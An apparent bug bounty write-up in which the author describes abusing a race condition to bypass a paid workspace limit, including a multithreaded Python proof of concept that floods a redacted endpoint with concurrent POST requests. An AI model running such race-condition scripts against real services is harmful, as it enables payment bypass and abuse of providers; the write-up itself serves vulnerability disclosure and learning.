Hello, it is r0b0ts.
In this story, I am going to talk about success story with race condition and ignored about it. I was so puzzled. So, I want to share about it.
As usually, I was interacting with the application. When I was checking about version authorization, I found that there are 3 different version. The versions are normal, premium, professional. For use the premium and professional version, user should pay extra money. I suddenly thought that “if Race Condition vulnerability exists, user can bypass payment process for using premium version?”. So, I tried to trigger Race Condition vulnerability.
First, normal version user only can make 3 workspace. If user want to use more workspace, user should pay about it.
As shown above request and response, if normal user already has 3 workspace, user can not make workspace and get 403 forbidden.
Then, I successfully trigger Race Condition with Burp-Suite extension Turbo-Intruder and I can get a lot of workspace. The response status 201 means that workspace was created successfully.
import threading
import requests, json
import time
try_making = 30
data = {"[request body]"}
headers = {'Content-Type': 'application/json; charset=utf-8'}
cookies = {'_dct': '[JWT token]'}
#request with credential
def making_workspace():
global try_making, data, headers, cookies
if try_making > 0:
response = requests.post('https://vulnerable_host/workspace', data=json.dumps(data), headers=headers, cookies=cookies)
print(response.text)
try_making -= 1
#request with multithread
def current_execution():
for i in range(3):
making_workspace()
#threading
thread1 = threading.Thread(target=current_execution)
thread2 = threading.Thread(target=current_execution)
thread3 = threading.Thread(target=current_execution)
thread4 = threading.Thread(target=current_execution)
thread5 = threading.Thread(target=current_execution)
thread6 = threading.Thread(target=current_execution)
thread7 = threading.Thread(target=current_execution)
thread8 = threading.Thread(target=current_execution)
thread9 = threading.Thread(target=current_execution)
#thread start
thread1.start()
thread2.start()
thread3.start()
thread4.start()
thread5.start()
thread6.start()
thread7.start()
thread8.start()
thread9.start()
#thread end
thread1.join()
thread2.join()
thread3.join()
thread4.join()
thread5.join()
thread6.join()
thread7.join()
thread8.join()
thread9.join()
print("Final remain trying: %d" % try_making)
The above code is POC code. I adjusted thread, try_making value to successfully trigger. In order to keep secret, I erased the request payload.
For easy understanding the POC code, I added my picture. When I actually ran the code, the race window changes with each execution. So, I had to adjust the thread.
It is result of the POC code execution and successfully got a lot of workspace.
However, after I submitted report, I received like above picture :(
I am so sad about it and upset about the program that have not been notified in advance.